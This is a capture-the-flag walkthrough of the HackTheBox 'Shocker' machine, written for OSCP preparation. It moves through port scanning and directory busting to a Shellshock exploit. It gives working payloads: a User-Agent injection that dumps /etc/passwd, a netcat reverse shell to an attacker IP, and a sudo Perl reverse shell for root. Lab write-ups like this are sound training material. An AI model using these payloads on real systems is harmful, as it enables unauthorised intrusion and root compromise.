HackTheBox: Shocker [OSCP Prep]
- OS: Linux π§
- Difficulty: Easy π
- Release: 30 Sep 2017 π
- IP: 10.10.10.56 π»
- Box Creator: mrb3n π
Hello there guys. Welcome to my 5th post on the TJnull OSCP Prep Series. Today weβre going to be discussing Shocker from HackTheBox.
Letβs begin with a full Nmap scan port scan to see what open ports we can find. Iβve used Rustscan because it provides faster Nmap results:
$ rustscan -a 10.10.10.56 -r 1-65535 -b 65 -- -sV -sC -Pn
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD8ArTOHWzqhwcyAZWc2CmxfLmVVTwfLZf0zhCBREGCpS2WC3NhAKQ2zefCHCU8XTC8hY9ta5ocU+p7S52OGHlaG7HuA5Xlnihl1INNsMX7gpNcfQEYnyby+hjHWPLo4++fAyO/lB8NammyA13MzvJy8pxvB9gmCJhVPaFzG5yX6Ly8OIsvVDk+qVa5eLCIua1E7WGACUlmkEGljDvzOaBdogMQZ8TGBTqNZbShnFH1WsUxBtJNRtYfeeGjztKTQqqj4WD5atU8dqV/iwmTylpE7wdHZ+38ckuYL9dmUPLh4Li2ZgdY6XniVOBGthY5a2uJ2OFp2xe1WS9KvbYjJ/tH
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiFJd2F35NPKIQxKMHrgPzVzoNHOJtTtM+zlwVfxzvcXPFFuQrOL7X6Mi9YQF9QRVJpwtmV9KAtWltmk3qm4oc=
| 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC/RjKhT/2YPlCgFQLx+gOXhC6W3A3raTzjlXQMT8Msk
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:41
Completed NSE at 19:41, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:41
Completed NSE at 19:41, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:41
Completed NSE at 19:41, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.05 secondsUsually, the SSH service is running on port 22 but here it runs on port 2222. This could happen due to a number of reasons
- The sysadmin is trying to hide SSH service being detecting by common nmap scans.
- This might be a backdoor which another attacker has setup.
Let’s keep SSH in the back of our mind for now and move on with HTTP. I started directory busting with dirsearch
$ dirsearch -u "http://10.10.10.56/"
Target: http://10.10.10.56/
[22:31:54] Starting:
[22:32:01] 403 - 297B - /.ht_wsr.txt
[22:32:02] 403 - 300B - /.htaccess_orig
[22:32:02] 403 - 298B - /.htaccess_sc
[22:32:02] 403 - 301B - /.htaccess_extra
[22:32:02] 403 - 298B - /.htaccessBAK
[22:32:02] 403 - 300B - /.htaccess.orig
[22:32:02] 403 - 300B - /.htaccess.bak1
[22:32:02] 403 - 298B - /.htaccessOLD
[22:32:02] 403 - 302B - /.htaccess.sample
[22:32:02] 403 - 299B - /.htaccessOLD2
[22:32:02] 403 - 290B - /.htm
[22:32:02] 403 - 291B - /.html
[22:32:02] 403 - 300B - /.htaccess.save
[22:32:02] 403 - 296B - /.htpasswds
[22:32:02] 403 - 297B - /.httr-oauth
[22:32:02] 403 - 300B - /.htpasswd_test
[22:32:46] 403 - 294B - /cgi-bin/
[22:33:03] 200 - 137B - /index.html
[22:33:26] 403 - 299B - /server-status
[22:33:26] 403 - 300B - /server-status/
Task CompletedWe get a bunch of locations with 403 (Forbidden). But among them, the /cgi-bin stands out to me.
/cgi-bin directory is where you put all of your CGI scripts. CGI scripts are simply external executable programs to provide extended functionality to the web server. You can learn more here.
Let’s try to hunt down some cgi-scripts that lives in the /cgi-bin directory.
$ dirsearch -u http://10.10.10.56/cgi-bin -e php,py,js,sh
Target: http://10.10.10.56/cgi-bin/
[22:57:54] Starting:
[22:58:00] 403 - 305B - /cgi-bin/.ht_wsr.txt
[22:58:00] 403 - 308B - /cgi-bin/.htaccess.bak1
[22:58:00] 403 - 308B - /cgi-bin/.htaccess.orig
[22:58:00] 403 - 308B - /cgi-bin/.htaccess.save
[22:58:00] 403 - 310B - /cgi-bin/.htaccess.sample
[22:58:00] 403 - 309B - /cgi-bin/.htaccess_extra
[22:58:00] 403 - 306B - /cgi-bin/.htaccess_sc
[22:58:00] 403 - 307B - /cgi-bin/.htaccessOLD2
[22:58:00] 403 - 308B - /cgi-bin/.htaccess_orig
[22:58:00] 403 - 299B - /cgi-bin/.html
[22:58:00] 403 - 306B - /cgi-bin/.htaccessOLD
[22:58:00] 403 - 298B - /cgi-bin/.htm
[22:58:00] 403 - 306B - /cgi-bin/.htaccessBAK
[22:58:01] 403 - 308B - /cgi-bin/.htpasswd_test
[22:58:01] 403 - 304B - /cgi-bin/.htpasswds
[22:58:01] 403 - 305B - /cgi-bin/.httr-oauth
[22:59:01] 200 - 118B - /cgi-bin/user.sh
Task Completed/cgi-bin/user.sh looks interesting to us. This is what we get when executing the file:
.sh runs bash. Old versions of bash are vulnerable to shellshock. You can learn more about shellshock here and here. Let’s try to exploit shellshock.
Exploitation
Payload (Dump /etc/passwd):
() { :; }; echo; /bin/bash -c 'cat /etc/passwd'The idea is to inject the payload into an HTTP header. In this case, we are trying to inject the payload into the User-Agent header.
curl http://10.10.10.56/cgi-bin/user.sh -H "User-Agent: () { :; }; echo; /bin/bash -c 'cat /etc/passwd'"
Now let’s get a shell shall we:
curl http://10.10.10.56/cgi-bin/user.sh -H "User-Agent: () { :; }; echo; /bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.17 1337 >/tmp/f'"Post-Exploitation
List programs with sudo permissions.
Perl is runnable as root with no prompt to enter any password
sudo -u root perl -e 'use Socket;$i="10.10.14.17";$p=1338;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'Get a reverse shell connection with root permissions.
I hope you have learned something valuable by reading my write-up. If you like this post please share it with your fellow hackermates and if you have any questions & suggestions please feel free to post them down in the comments. I’d love to hear and learn from you.
If you enjoyed this write-up show me some β€οΈ by giving me some respect π― at [email protected] which helps & motivates me to create content like this for the awesome hacking community. Have a great day guys π. See you in the next post.
